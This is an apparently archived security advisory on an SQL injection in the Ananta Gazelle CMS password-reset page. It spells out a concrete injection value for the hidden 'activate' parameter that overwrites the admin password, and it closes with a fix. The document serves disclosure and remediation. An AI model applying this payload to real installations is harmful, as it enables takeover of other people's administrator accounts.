Ananta Gazelle SQL Injection Vulnerability
##########################www.BugReport.ir##################################=
######
#
# AmnPardaz Security Research Team
#
# Title:=09=09Ananta Gazelle SQL Injection Vulnerability
# Vendor:=09=09http://www.anantasoft.com/
# Vulnerable Version:=091.0 (Latest version till now)
# Exploitation:=09=09Remote with browser
# Fix:=09=09=09N/A
############################################################################=
#######
####################
- Description:
####################
Ananta Gazelle is a rich JavaScript enabled CMS with multiple CSS =20
templates. It is written in
PHP and uses MySQL. Approximately all of the queries of this CMS are =20
written without dealing
with any one of user inputs in order to avoid SQL injection (as =20
described by its comments:)
####################
- Vulnerability:
####################
+--> SQL Injection
=09The forgotten password page "forgot.php" uses hidden inputs for =20
creating a query in order to set
=09an activation code. This vulnerability can be used to change the =20
password of anyone.
####################
- Exploits/PoCs:
####################
+--> Exploiting The (MySQL) SQL Injection:
=09There are three affected parameters: 'table', 'activate', 'email'.
=09All of them can be used for injection. For example we can change the =20
password of the admin
=09user to "mypass" by setting the following values:
=09=09table=3D"users"=09=09(unchanged)
=09=09activate=3D"123', pass=3Dmd5('mypass'), activate=3D'456"
=09=09email=3D"the email of the admin user"
####################
- Solution:
####################
Sanitize the inputs of forgot.php file and do not place the parameters =20
in the hidden inputs (migrate them to the session instead).
####################
- Original Advisory:
####################
http://www.bugreport.ir/index_70.htm
####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com